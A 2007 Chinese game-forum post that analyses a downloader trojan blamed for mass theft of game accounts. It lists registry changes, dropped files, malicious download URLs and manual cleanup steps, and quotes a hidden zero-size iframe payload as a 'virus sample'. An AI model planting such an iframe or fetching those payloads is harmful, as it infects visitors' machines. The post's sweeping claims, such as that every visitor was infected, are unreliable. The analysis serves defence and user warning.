关于最近大话号批量被盗的几点说明!
最近看了很多的帖子都说大话号莫名其妙的被盗。经过这几天的对大量当事人的咨询(173位被盗号的朋友)。经过甄选。报送20CN网络小组,黑鹰等国内知名电脑病毒类网站。得出以下结论!
2007年5月12日下午5点左右。太平洋电脑网接网友来报,称网易、新浪、Tom、QQ等站点都被挂上木马,经检查后发现,木马均挂在allyes广告系统中。这一广告嵌在iframe中,不易在源代码中发现。(图1即为网易当时被挂马的截图)资讯连接地址:
http://www.pconline.yzz.cn.yzz.cn/pcedu/softnews/bingdu/0705/1014188.html
也就是说当日浏览过这些网站的朋友已经全部中毒了!!!我不知道为什么网易没有发出通告。可能是为了自己那可怜的面子!!!玩家的利益才在最终的利益。让这么多人损失这么大。网易有不可推卸的责任!!!
被挂的木马为:Virus.Win32.AutoRun.p
此病毒为(“下载者”变种)该病毒是一个木马下载器,当发现受感染电脑的IE可用时,它会自动连接多个恶意站点,下载其他的多个木马病毒,下载的病毒都是一些盗号木马病毒,对用户的网络虚拟财产构成严重的威胁。此外,这次的变种会通过感染电脑的可移动磁盘,达到扩散病毒的目的,极有可能造成病毒蔓延的现象,建议用户提高警惕,捍卫电脑的安全。
发作症状:该病毒运行后,会将自身复制为BinNice.bak,同时释放一个BinNice.dll病毒文件。注入到系统进程explorer.exe里,连接多个恶意站点,进行病毒下载。向可移动磁盘中释放Ghost.pif和autorun.inf病毒文件,以其来传播自身。
此病毒传播途径绝大部分为IE,通过病毒样本可以看出,此病毒同之前臭名昭著的毒网7y7.us是一个团伙。此病毒利用微软MS06-014和MS07-017漏洞网页木马来下载病毒,并进行ARP攻击。它企图将HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\下面的某些注册表项(看下面)全部删除!而且还利用romdrivers.dll插入到用户进程一起删除那些注册表项!此病毒将除了自己以外的所有一般病毒的感染键值全部删除。也就是说它企图排除异己的病毒,达到霸占计算机的目的。
这些是它删除的键值:
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8
之后插入此病毒的键值:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{09B68AD9-FF66-3E63-636B-B693E62F6236}
HKCR\CLSID\{09B68AD9-FF66-3E63-636B-B693E62F6236}
dll文件指向C:\Program Files\Internet Explorer\romdrivers.dll
在HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations添加:
\??\C:\Program Files\Internet Explorer\romdrivers.bkk
!\??\C:\Program Files\Internet Explorer\romdrivers.dll
创建:HKCU\Software\SetVer\ver,在下面创建键值ME,值为1.25
之后他便成为一个名副其实的“下载者”了,企图利用被插入了病毒模块的explorer.exe访问它们的毒网,之后下载下面的一堆东西到%temp%目录,并陆续运行他们:
http://7y7.us/oK/svchost.exe
http://7y7.us/Sign/csrss.exe
http://7y7.us/Sign/svchost32.exe
http://7y7.us/Sign/smss.exe
http://7y7.us/Sign/services.exe
http://7y7.us/Sign/svchost.exe
http://7y7.us/Sign/conime.exe
http://7y7.us/Sign/ctfmon.exe
http://7y7.us/Sign/mmc.exe
http://7y7.us/Sign/IEXPLORE.EXE
http://7y7.us/Sign/stpgldk.exe
http://7y7.us/Sign/srogm.exe
http://7y7.us/Sign/spglsdr.exe
http://7y7.us/Sign/copypfh.exe
之后改动文件安装全局钩子,将病毒dll文件注入系统中存在的进程。
每个都在%temp%目录生成一个exe文件的副本和一个dll文件,接着退出并利用explorer.exe将原来的删除
文件列表:
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\csrss.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\woso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\woso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost32.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ztso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ztso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\smss.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mhso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mhso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\services.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fyso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fyso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jtso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jtso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\conime.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wlso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wlso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ctfmon.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wgso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wgso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mmc.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wmso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wmso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IEXPLORE.EXE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qjso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qjso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\stpgldk.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\srogm.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wdso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wdso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\spglsdr.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\copypfh.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\daso.exe(大话西游盗号木马)
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\daso0.dll
倒数第二个即为这次大批量盗号的元凶!
此病毒也可以通过网吧,路由器等传播。就是说在网吧上过网。用过USB等等移动存储设备,一台电脑中毒,其他和这个电脑连接着路由器的电脑一样中毒。
提醒各网吧管理员:中毒的主机要想用ARP攻击,就得不断变化自己的MAC地址来截取和发送数据包。交换机上的哪台机器的流量最大。灯狂闪。就是它了。
手动清理方法
准备工具:icesword 1.20
首先打开任务管理器,在explorer.exe上面右键——结束进程树;
接着用任务管理器打开icesword并退出任务管理器,转到文件选项卡,进入
C:\Program Files\Internet Explorer\目录,选择romdrivers.dll、
romdrivers.bkk和romdrivers.bak,之后右键——强制删除
转到C:\Documents and Settings\当前用户名\Local Settings\Temp目录,按一
下创建时间,然后在那堆创建时间一样的exe和dll文件上面右键——强制删除
调出任务管理器并用它打开regedit(用icesword的注册表选项卡也可以,但那个
操作不太方便)接着把下面的注册表项或者键值删除:
HKCR\CLSID\{09B68AD9-FF66-3E63-636B-B693E62F6236}
HKCU\Software\SetVer\ver
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面的那一堆启动项
HKLM\SYSTEM\ControlSet001\Control\SessionManager\PendingFileRenameOperations里面的\??\C:\Program Files\Internet Explorer\romdrivers.bkk以及!\??\C:\Program Files\Internet Explorer\romdrivers.dll这两行;
然后将HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks下面的{09B68AD9-FF66-3E63-636B-B693E62F6236} 重命名为{AEB6717E-7E19-11d0-97EE-00C04FD91972}
至于%windir%\system32\drivers\ect\下面的那个hosts文件,如果没有修改过,随便新建一个空的就可以了
重启,OK。
附加
病毒样本:
<iframe src=http://7y7.us/1.htm width=0 height=0></iframe> <html>
<head>
<meta http-equiv="Content-Type" c>
<title>[VBnet Internet] Public IP Address SSI Page</title>
</head>
<body>
任何病毒都是通过系统漏洞传播的。如果把微软通告的补丁全部打全,是90%不会出问题的。叶子猪于早前已经提醒过大家,微软的ANI安全漏洞很严重。一定要把系统补丁打全。对于这次大规模发生的盗号事件。只能说惋惜,遗憾。对于其他怀疑叶子猪网站的朋友,我只能说,没有最好。只有更好。我也只是一个版主,没权利代替叶子猪说什么话。但是,引用一位管理员的话:“我们是把玩家的利益和安全放第一位的”
附加一个专杀工具,于5月17日发布,这是我自己在网上找的,请使用前先检查杀毒!!!
http://hzyo.yzz.cn/killvirus.rar
连接地址:http://bbs.yezizhu.yzz.cn.yzz.cn/viewthread.php?tid=1062588&extra=page%3D2